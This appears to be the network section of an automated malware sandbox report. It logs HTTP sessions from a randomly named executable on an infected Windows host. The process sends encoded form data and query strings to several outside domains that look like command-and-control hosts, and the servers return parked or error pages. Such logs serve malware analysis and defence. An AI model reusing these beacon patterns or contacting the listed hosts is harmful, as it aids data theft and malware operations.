                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                          Data Raw: 71 46 48 6c 49 3d 71 78 6f 6e 44 34 67 51 46 76 4c 79 54 76 54 52 75 4a 46 34 6d 2b 35 4b 64 67 36 34 6c 42 39 39 39 49 69 64 6d 37 6f 69 33 4a 65 42 4d 66 6b 78 57 64 61 65 2f 36 38 76 57 6d 45 4f 6c 46 63 4d 61 72 75 32 63 73 44 42 61 30 54 33 59 30 34 46 57 7a 33 4e 62 44 5a 39 50 47 36 33 31 51 2f 71 58 39 49 70 68 6a 4b 6c 65 70 7a 77 76 76 71 5a 75 43 4d 77 45 56 68 58 75 34 4a 32 48 65 33 2b 68 31 79 35 67 67 34 30 54 79 7a 35 44 4a 54 49 6d 51 61 74 64 6a 64 37 4d 74 31 52 4d 52 4d 7a 67 68 50 4f 4d 6f 71 66 6e 30 64 46 45 49 59 52 4c 77 4c 2f 76 41 4d 6b 56 56 42 75 41 32 6b 49 62 36 6b 78 30 6c 47 2b 67 2b 6e 37 4a 6d 4b 64 56 52 33 53 53 61 6b 72 4c 38 32 6a 43 77 46 48 75 77 3d 3d
                                                                                                                          Data Ascii: qFHlI=qxonD4gQFvLyTvTRuJF4m+5Kdg64lB999Iidm7oi3JeBMfkxWdae/68vWmEOlFcMaru2csDBa0T3Y04FWz3NbDZ9PG631Q/qX9IphjKlepzwvvqZuCMwEVhXu4J2He3+h1y5gg40Tyz5DJTImQatdjd7Mt1RMRMzghPOMoqfn0dFEIYRLwL/vAMkVVBuA2kIb6kx0lG+g+n7JmKdVR3SSakrL82jCwFHuw==


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          51192.168.2.65736794.23.162.163802656C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Oct 21, 2024 17:28:04.518980026 CEST1809OUTPOST /9vwi/ HTTP/1.1
                                                                                                                          Host: www.productanalytics.pro
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en
                                                                                                                          Origin: http://www.productanalytics.pro
                                                                                                                          Referer: http://www.productanalytics.pro/9vwi/
                                                                                                                          Content-Length: 1246
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                          Data Raw: 71 46 48 6c 49 3d 71 78 6f 6e 44 34 67 51 46 76 4c 79 54 76 54 52 75 4a 46 34 6d 2b 35 4b 64 67 36 34 6c 42 39 39 39 49 69 64 6d 37 6f 69 33 4a 6d 42 4d 74 63 78 56 36 32 65 2b 36 38 76 66 47 45 4e 6c 46 63 52 61 71 47 79 63 73 50 52 61 32 62 33 5a 57 41 46 51 43 33 4e 52 44 5a 39 44 6d 36 36 78 51 2f 2f 58 39 35 69 68 6a 61 6c 65 70 7a 77 76 74 79 5a 70 58 34 77 58 46 68 55 70 34 4a 36 44 65 33 47 68 31 61 49 67 67 39 57 55 42 37 35 43 6f 6a 49 71 44 79 74 66 44 64 6c 4a 74 30 4f 4d 52 4a 7a 67 68 69 33 4d 73 69 6d 6e 7a 31 46 55 4d 34 4d 4f 67 2b 6d 39 6d 59 66 4a 69 39 2b 41 32 39 6a 5a 59 6f 4a 79 33 36 51 2f 65 6a 6b 48 47 2b 42 5a 51 57 55 61 4c 49 68 46 72 4c 79 50 77 55 77 34 58 67 67 54 4f 43 36 67 4e 47 6c 6e 68 37 47 76 78 4e 77 5a 5a 71 38 74 44 7a 70 45 50 70 56 65 6b 61 54 45 72 6b 68 77 36 30 35 47 73 45 5a 4e 48 59 75 68 69 54 33 6a 44 4f 4c 53 69 45 30 6a 42 6a 34 70 7a 4f 54 46 4c 71 6b 74 48 2f 33 48 30 76 62 6e 6c 61 4c 31 5a 69 66 75 4d 37 32 4d 42 75 4d 50 7a 78 49 75 76 32 76 [TRUNCATED]
                                                                                                                          Data Ascii: qFHlI=qxonD4gQFvLyTvTRuJF4m+5Kdg64lB999Iidm7oi3JmBMtcxV62e+68vfGENlFcRaqGycsPRa2b3ZWAFQC3NRDZ9Dm66xQ//X95ihjalepzwvtyZpX4wXFhUp4J6De3Gh1aIgg9WUB75CojIqDytfDdlJt0OMRJzghi3Msimnz1FUM4MOg+m9mYfJi9+A29jZYoJy36Q/ejkHG+BZQWUaLIhFrLyPwUw4XggTOC6gNGlnh7GvxNwZZq8tDzpEPpVekaTErkhw605GsEZNHYuhiT3jDOLSiE0jBj4pzOTFLqktH/3H0vbnlaL1ZifuM72MBuMPzxIuv2voPYgTW/X4UVO0BBXWvNpLXD3LMtp0Q6NgaIekJUfPjtkZagDntQEVBHmM4zd656dx8+2CIaUFOd35M1p2Xos7M5ytqXlkKpt8Dh7ktdCgJ8sBK73Wts30gZHc4hLXjdv15aSINey2gzFYy3qtnw0QGTCIQgxIxJEBrirIUe2rZlXLvL3BYz3xvHlc3TRSGtlBSIkz1lcSTUpooIAX1DbaXbk9SU/tNf23tCB0K4nbqx/etKPrKCPH18A5SBm890gUDXc0xnEsJsZtIQgtk60AeQbIqFXSpZioI2QlI2qhtmGhR/gHlz71B2tDeEdP/8bu+6LTB+kGSalR45eFeqsOtV9MndaxZfG++wFCNEgJhQddohs6V1YUdAg33CPIOqoxWYhT6UIRs7bUWW8l2nsvuwCyp6ZL0LrHE+fy1R94uDE6aPJNJxLb/ppYRxG8FGE+6y+IKMsb5LX5k0uWr9514FkWliVwMtY0k44FEnie1iTb/hCaDs/C78fI4Hl2lNQDaYd3xx4+FQNVSIApN/yrCOamXYry+egvxtUR9JDbKuxm6r4P4OtLTLaIWn/uVsNDewpXsWR9x0ZaDb5oDO1cOuPuCEGzoqKZNCWI26F/qwlpJezop0QZWiSh3XqlFx3Ep5uD4C2ECh73BfPfUL+BVHICTsioHiitE [TRUNCATED]


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          52192.168.2.65736894.23.162.163802656C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Oct 21, 2024 17:28:07.066732883 CEST503OUTGET /9vwi/?qFHlI=nzAHAMVHTcHZef2dtsV+gZN2Jg+zshsJ+9OWn5ktx4T+L9EMDtm05+R8HUsMmhIjUd2KUuTNFTfuNiAYWk32clZoBW+L2SPWINxOvyiUavjXvOCviB5/F051x4xiH/bw0UeFq30=&DJ=uNx48jdPyvmhqtM0 HTTP/1.1
                                                                                                                          Host: www.productanalytics.pro
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                          Accept-Language: en-US,en
                                                                                                                          Connection: close
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                          Oct 21, 2024 17:28:07.631675005 CEST1236INHTTP/1.1 200 OK
                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                          Date: Mon, 21 Oct 2024 15:28:07 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Content-Length: 7468
                                                                                                                          Last-Modified: Thu, 08 Apr 2021 14:34:06 GMT
                                                                                                                          Connection: close
                                                                                                                          ETag: "606f145e-1d2c"
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 2f 3e 0d 0a 20 20 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 2c 20 6e 6f 61 72 63 68 69 76 65 2c 20 6e 6f 73 6e 69 70 70 65 74 2c 20 6e 6f 6f 64 70 22 20 2f 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 54 68 69 73 20 64 6f 6d 61 69 6e 20 68 61 73 20 61 20 70 65 6e 64 69 6e 67 20 49 43 41 4e 4e 20 76 65 72 69 66 69 63 61 74 69 6f 6e 20 61 6e 64 20 69 73 20 73 75 73 70 65 6e 64 65 64 2e 22 20 2f 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 4b 65 79 2d 53 79 73 [TRUNCATED]
                                                                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"/> <meta name="robots" content="noindex, nofollow, noarchive, nosnippet, noodp" /> <meta name="description" content="This domain has a pending ICANN verification and is suspended." /> <meta name="keywords" content="" /> <meta name="author" content="Key-Systems GmbH | CM" /> <meta name="publisher" content="Key-Systems GmbH" /> <meta name="viewport" content="width=device-width, initial-scale=1" /> <link rel="stylesheet" type="text/css" href="assets/css/bootstrap.min.css"> <link rel="stylesheet" type="text/css" href="assets/css/font-awesome.min.css"> <link rel="stylesheet" type="text/css" href="assets/css/screen.css"> <link rel="shortcut icon" href="assets/img/favicon.png"> <title>Contact Verification Suspension Page</title></head><body><header><div class="overlay bright"></div><div class="container"><div class="heading"><div class="row"><
                                                                                                                          Oct 21, 2024 17:28:07.631716013 CEST1236INData Raw: 68 31 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 68 61 73 20 62 65 65 6e 20 73 75 73 70 65 6e 64 65 64 20 64 75 65 20 74 6f 20 6e 6f 6e 2d 63 6f 6d 70 6c 65 74 69 6f 6e 20 6f 66 20 61 6e 20 49 43 41 4e 4e 2d 6d 61 6e 64 61 74 65 64 20 63 6f 6e 74 61
                                                                                                                          Data Ascii: h1>This domain has been suspended due to non-completion of an ICANN-mandated contact verification.</h1><p>As part of the ongoing effort to improve contact quality, the Internet Corporation for Assigned Names and Numbers (ICANN) requires
                                                                                                                          Oct 21, 2024 17:28:07.631732941 CEST1236INData Raw: 6f 6d 61 69 6e 20 72 65 67 69 73 74 72 61 6e 74 20 68 61 73 20 62 65 65 6e 20 6d 6f 64 69 66 69 65 64 20 6f 72 20 63 68 61 6e 67 65 64 20 62 75 74 20 6e 6f 74 20 76 65 72 69 66 69 65 64 20 79 65 74 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 0d 0a 09 09
                                                                                                                          Data Ascii: omain registrant has been modified or changed but not verified yet.</span><br>Changing the email address of the domain registrant requires a verification.</li><li><i class="fa fa-play"></i><span class="bold">The domain has recent
                                                                                                                          Oct 21, 2024 17:28:07.631942987 CEST1236INData Raw: 76 20 63 6c 61 73 73 3d 22 69 63 6f 6e 5f 6c 65 66 74 22 3e 0d 0a 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 63 68 65 63 6b 2d 63 69 72 63 6c 65 22 3e 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09
                                                                                                                          Data Ascii: v class="icon_left"><span class="fa fa-check-circle"></span></div><div class="slice_content"><p><span class="bold">Click the link provided in the verification email sent to you by your Registrar or direct service provide
                                                                                                                          Oct 21, 2024 17:28:07.631963015 CEST848INData Raw: 72 2c 20 79 6f 75 72 20 64 6f 6d 61 69 6e 20 70 72 6f 76 69 64 65 72 20 6d 69 67 68 74 20 70 72 6f 76 69 64 65 20 74 68 65 20 72 65 73 70 65 63 74 69 76 65 20 74 72 69 67 67 65 72 20 63 6f 64 65 20 75 6e 64 65 72 20 63 65 72 74 61 69 6e 20 63 6f
                                                                                                                          Data Ascii: r, your domain provider might provide the respective trigger code under certain conditions. This trigger code can be entered on <a href="http://emailverification.info/">http://emailverification.info/</a> to verify your registrant contact data
                                                                                                                          Oct 21, 2024 17:28:07.631978989 CEST1236INData Raw: 65 72 69 66 79 20 72 65 67 69 73 74 72 61 6e 74 20 65 6d 61 69 6c 20 61 64 64 72 65 73 73 65 73 20 61 6e 64 20 63 6f 6e 74 61 63 74 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 77 69 74 68 69 6e 20 31 35 20 64 61 79 73 20 61 66 74 65 72 20 72 65 67 69
                                                                                                                          Data Ascii: erify registrant email addresses and contact information within 15 days after registration and incoming transfers. If registrant data is not verified in time, ICANN mandates registrars to suspend the corresponding website of the affected domai
                                                                                                                          Oct 21, 2024 17:28:07.631994009 CEST684INData Raw: 6c 61 73 73 3d 22 62 6f 6c 64 22 3e 48 6f 77 20 6c 6f 6e 67 20 64 6f 65 73 20 69 74 20 74 61 6b 65 20 75 6e 74 69 6c 20 6d 79 20 77 65 62 73 69 74 65 20 63 6f 6d 65 73 20 62 61 63 6b 20 6f 6e 6c 69 6e 65 20 61 66 74 65 72 20 74 68 65 20 73 75 73
                                                                                                                          Data Ascii: lass="bold">How long does it take until my website comes back online after the suspension is removed?</span><br>After the verification has been successfully completed the suspension is removed within 30 minutes. Please keep in mind that


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          53192.168.2.657369188.114.96.380
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Oct 21, 2024 17:28:24.690052986 CEST496OUTGET /qw71/?qFHlI=+N/0E0v6NJCVb805MplOCuiY6zvMpGzoX4nqdcW8deD1xdZOlnbQg5vou9xNSSthlFMWUYds/nxA/0yqGkfxCl1maFN4do860hmE4XwK9H8rJm4CQQIXjRIUyqXGbNbQLu85qd4=&DJ=uNx48jdPyvmhqtM0 HTTP/1.1
                                                                                                                          Host: www.itemsort.shop
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                          Accept-Language: en-US,en
                                                                                                                          Connection: close
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                          Oct 21, 2024 17:28:25.255880117 CEST936INHTTP/1.1 404
                                                                                                                          Date: Mon, 21 Oct 2024 15:28:25 GMT
                                                                                                                          Content-Type: text/html;charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=axVSyJ9Q8U%2BlMJpXnu1AQ%2BHAGMK5kofukqB4TSWi6uu89vBe9qC0z3AfbZTrR5P3c2fzbpD5YWHu%2B3uJwBysI%2FMD1zUMpac21yZ38CdiNPO8IfooDyu%2Bcr%2FIF%2F4YjA%2FE72Uytw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8d6246fc989a42b7-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1168&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=496&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 61 31 0d 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 35 2e 30 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: a1<html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx/1.15.0</center></body></html>0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          54192.168.2.65737052.13.151.17980
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Oct 21, 2024 17:28:30.283085108 CEST760OUTPOST /t7t4/ HTTP/1.1
                                                                                                                          Host: www.rudemyvague.info
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en
                                                                                                                          Origin: http://www.rudemyvague.info
                                                                                                                          Referer: http://www.rudemyvague.info/t7t4/
                                                                                                                          Content-Length: 210
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                          Data Raw: 71 46 48 6c 49 3d 45 4f 73 66 47 75 4e 45 7a 67 6d 2f 56 6e 6f 42 37 71 2b 53 35 7a 5a 65 62 2f 30 50 68 4d 5a 61 38 4f 6a 57 76 43 65 74 76 46 49 62 66 74 4f 6d 4f 6d 72 37 51 51 2f 4f 70 66 56 39 4e 64 49 61 50 56 55 39 51 35 63 35 70 6e 53 6d 5a 4a 37 63 6f 2f 6d 58 4e 58 71 65 61 43 69 72 6a 54 32 67 64 2b 73 39 48 51 70 71 72 36 64 39 72 61 6e 2b 52 47 42 58 37 56 56 69 2f 75 75 64 62 33 42 37 6c 34 30 4c 30 51 52 51 30 2b 6f 48 77 50 59 6c 69 45 79 79 2b 34 41 59 38 4d 6d 4a 4c 46 41 53 63 6b 53 2b 45 70 69 30 50 50 57 35 59 30 41 70 56 64 41 2f 4c 58 59 35 6f 2f 49 6e 42 47 46 30 53 43 41 63 2b 51 4e 42 56 72 4f 51
                                                                                                                          Data Ascii: qFHlI=EOsfGuNEzgm/VnoB7q+S5zZeb/0PhMZa8OjWvCetvFIbftOmOmr7QQ/OpfV9NdIaPVU9Q5c5pnSmZJ7co/mXNXqeaCirjT2gd+s9HQpqr6d9ran+RGBX7VVi/uudb3B7l40L0QRQ0+oHwPYliEyy+4AY8MmJLFASckS+Epi0PPW5Y0ApVdA/LXY5o/InBGF0SCAc+QNBVrOQ
                                                                                                                          Oct 21, 2024 17:28:30.849168062 CEST1236INHTTP/1.1 200 OK
                                                                                                                          Server: nginx/1.10.3
                                                                                                                          Date: Mon, 21 Oct 2024 15:28:30 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          X-Powered-By: PHP/5.3.3
                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                          Content-Security-Policy: default-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'
                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          Referrer-Policy: no-referrer-when-downgrade
                                                                                                                          Permissions-Policy: geolocation=(), microphone=()
                                                                                                                          Expires: 0
                                                                                                                          Content-Encoding: gzip
                                                                                                                          Data Raw: 32 66 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 95 df 6f 9b 30 10 c7 9f cb 5f 61 31 4d 6d a5 26 e4 47 93 34 94 20 4d 5b 3b 4d da c3 b4 4e 7b 37 f8 42 bc 81 4d 6d 43 9b 56 fb 5f f6 d8 fc 1d f9 c7 76 86 90 a6 95 3a 78 c2 9c 7d 9f fb de f9 6c 07 2b 93 a5 a1 e3 04 2b a0 2c 74 02 c3 4d 0a e1 4d 91 e7 0a b4 e6 52 10 06 9a 30 29 c4 76 03 3a f0 ea 79 07 1d b4 59 57 a3 48 b2 f5 a3 73 b4 94 c2 f4 96 34 e3 e9 da ff a0 38 4d 2f 77 36 cd 1f c0 1f 4e f3 fb 4b e7 8f e3 ac 86 8f 87 f6 d1 c0 da 8f 0c dc 9b 9e 51 54 e8 a5 54 99 8f d1 41 c5 54 43 e5 d2 8f 12 eb 14 d1 f8 77 a2 64 21 98 5f a8 f4 e4 d8 d3 dc 80 c7 b3 c4 43 1c 1b f6 ef 20 ca 8f 4f 49 0c c2 80 22 46 e6 44 c8 9e 82 1c a8 69 30 a3 56 cc a8 0b 66 dc 8a 19 77 c1 9c b7 62 ce bb 60 26 ad 98 49 17 cc b4 15 33 ed 82 99 b5 62 66 5d 30 17 ad 98 8b 2e 98 79 2b 66 de 05 33 1c b4 f7 df a0 0b e8 05 a6 3e 01 24 96 25 a8 7a c1 83 14 f0 03 8f 02 2e 73 8e 32 aa 12 2e 7a c8 c1 53 52 1f 93 03 df 58 a6 52 f9 ef 46 a3 11 da 65 4e 63 6e d6 fe a0 3f 9f e0 ef 1d 67 66 e5 cf 06 ef [TRUNCATED]
                                                                                                                          Data Ascii: 2fdo0_a1Mm&G4 M[;MN{7BMmCV_v:x}l++,tMMR0)v:yYWHs48M/w6NKQTTATCwd!_C OI"FDi0Vfwb`&I3bf]0.y+f3>$%z.s2.zSRXRFeNcn?gf/N%q4Gouz]<ZDuU\8/'wSr(q. HU(5U_RJN@gsqJrC'}xI<U[koH"RqBurTBy[e~(hL/*J3.NX<SF0JB)OI.UkB(m7K.%^^G-<H5j^k}_|Wt'$[Xb}AAsXI\R^
                                                                                                                          Oct 21, 2024 17:28:30.849183083 CEST106INData Raw: e4 29 8d 61 25 53 06 6a e1 fe ac e2 5d d5 33 0a b0 a4 0a 90 d9 8c 5c 42 bc f0 59 c4 8b 18 ba 88 32 fe 1c e5 66 5f 82 57 c9 e3 2e 8b 26 65 97 54 6d ba 70 ab b7 e8 0e 78 b2 32 7e 84 5a 2e c9 9b 8f 91 cd ad da 92 5d fb 05 de be 0e 8d d9 c3 8e b6 7b
                                                                                                                          Data Ascii: )a%Sj]3\BY2f_W.&eTmpx2~Z.]{y.e0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          55192.168.2.65737152.13.151.17980
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Oct 21, 2024 17:28:32.839207888 CEST784OUTPOST /t7t4/ HTTP/1.1
                                                                                                                          Host: www.rudemyvague.info
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en
                                                                                                                          Origin: http://www.rudemyvague.info
                                                                                                                          Referer: http://www.rudemyvague.info/t7t4/
                                                                                                                          Content-Length: 234
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                          Data Raw: 71 46 48 6c 49 3d 45 4f 73 66 47 75 4e 45 7a 67 6d 2f 57 48 59 42 39 35 57 53 79 7a 5a 5a 48 50 30 50 75 73 5a 57 38 4f 76 57 76 44 4b 39 76 77 67 62 47 49 4b 6d 4e 69 2f 37 44 67 2f 4f 6a 2f 56 38 43 39 49 64 50 56 51 31 51 37 49 35 70 6d 79 6d 5a 49 6e 63 72 4e 4f 51 4d 48 71 63 50 53 69 74 2b 44 32 67 64 2b 73 39 48 51 38 4e 72 36 31 39 72 70 2f 2b 51 6a 74 55 6e 46 56 68 38 75 75 64 66 33 42 2f 6c 34 30 31 30 52 4e 71 30 38 67 48 77 50 49 6c 69 52 53 78 30 34 42 79 79 73 6e 34 43 41 64 35 55 56 62 38 61 61 4f 46 4f 6f 47 6c 51 69 42 7a 4a 75 41 63 5a 48 34 37 6f 39 51 56 42 6d 46 65 51 43 34 63 73 48 42 6d 61 66 72 7a 66 42 71 39 35 43 48 4b 73 35 58 49 6f 52 46 74 76 39 78 76 44 41 3d 3d
                                                                                                                          Data Ascii: qFHlI=EOsfGuNEzgm/WHYB95WSyzZZHP0PusZW8OvWvDK9vwgbGIKmNi/7Dg/Oj/V8C9IdPVQ1Q7I5pmymZIncrNOQMHqcPSit+D2gd+s9HQ8Nr619rp/+QjtUnFVh8uudf3B/l4010RNq08gHwPIliRSx04Byysn4CAd5UVb8aaOFOoGlQiBzJuAcZH47o9QVBmFeQC4csHBmafrzfBq95CHKs5XIoRFtv9xvDA==
                                                                                                                          Oct 21, 2024 17:28:33.397758961 CEST1236INHTTP/1.1 200 OK
                                                                                                                          Server: nginx/1.10.3
                                                                                                                          Date: Mon, 21 Oct 2024 15:28:33 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          X-Powered-By: PHP/5.3.3
                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                          Content-Security-Policy: default-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'
                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          Referrer-Policy: no-referrer-when-downgrade
                                                                                                                          Permissions-Policy: geolocation=(), microphone=()
                                                                                                                          Expires: 0
                                                                                                                          Content-Encoding: gzip
                                                                                                                          Data Raw: 32 66 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 95 df 6f 9b 30 10 c7 9f cb 5f 61 31 4d 6d a5 26 e4 47 93 34 94 20 4d 5b 3b 4d da c3 b4 4e 7b 37 f8 42 bc 81 4d 6d 43 9b 56 fb 5f f6 d8 fc 1d f9 c7 76 86 90 a6 95 3a 78 c2 9c 7d 9f fb de f9 6c 07 2b 93 a5 a1 e3 04 2b a0 2c 74 02 c3 4d 0a e1 4d 91 e7 0a b4 e6 52 10 06 9a 30 29 c4 76 03 3a f0 ea 79 07 1d b4 59 57 a3 48 b2 f5 a3 73 b4 94 c2 f4 96 34 e3 e9 da ff a0 38 4d 2f 77 36 cd 1f c0 1f 4e f3 fb 4b e7 8f e3 ac 86 8f 87 f6 d1 c0 da 8f 0c dc 9b 9e 51 54 e8 a5 54 99 8f d1 41 c5 54 43 e5 d2 8f 12 eb 14 d1 f8 77 a2 64 21 98 5f a8 f4 e4 d8 d3 dc 80 c7 b3 c4 43 1c 1b f6 ef 20 ca 8f 4f 49 0c c2 80 22 46 e6 44 c8 9e 82 1c a8 69 30 a3 56 cc a8 0b 66 dc 8a 19 77 c1 9c b7 62 ce bb 60 26 ad 98 49 17 cc b4 15 33 ed 82 99 b5 62 66 5d 30 17 ad 98 8b 2e 98 79 2b 66 de 05 33 1c b4 f7 df a0 0b e8 05 a6 3e 01 24 96 25 a8 7a c1 83 14 f0 03 8f 02 2e 73 8e 32 aa 12 2e 7a c8 c1 53 52 1f 93 03 df 58 a6 52 f9 ef 46 a3 11 da 65 4e 63 6e d6 fe a0 3f 9f e0 ef 1d 67 66 e5 cf 06 ef [TRUNCATED]
                                                                                                                          Data Ascii: 2fdo0_a1Mm&G4 M[;MN{7BMmCV_v:x}l++,tMMR0)v:yYWHs48M/w6NKQTTATCwd!_C OI"FDi0Vfwb`&I3bf]0.y+f3>$%z.s2.zSRXRFeNcn?gf/N%q4Gouz]<ZDuU\8/'wSr(q. HU(5U_RJN@gsqJrC'}xI<U[koH"RqBurTBy[e~(hL/*J3.NX<SF0JB)OI.UkB(m7K.%^^G-<H5j^k}_|Wt'$[Xb}AAsXI\R^
                                                                                                                          Oct 21, 2024 17:28:33.397772074 CEST106INData Raw: e4 29 8d 61 25 53 06 6a e1 fe ac e2 5d d5 33 0a b0 a4 0a 90 d9 8c 5c 42 bc f0 59 c4 8b 18 ba 88 32 fe 1c e5 66 5f 82 57 c9 e3 2e 8b 26 65 97 54 6d ba 70 ab b7 e8 0e 78 b2 32 7e 84 5a 2e c9 9b 8f 91 cd ad da 92 5d fb 05 de be 0e 8d d9 c3 8e b6 7b
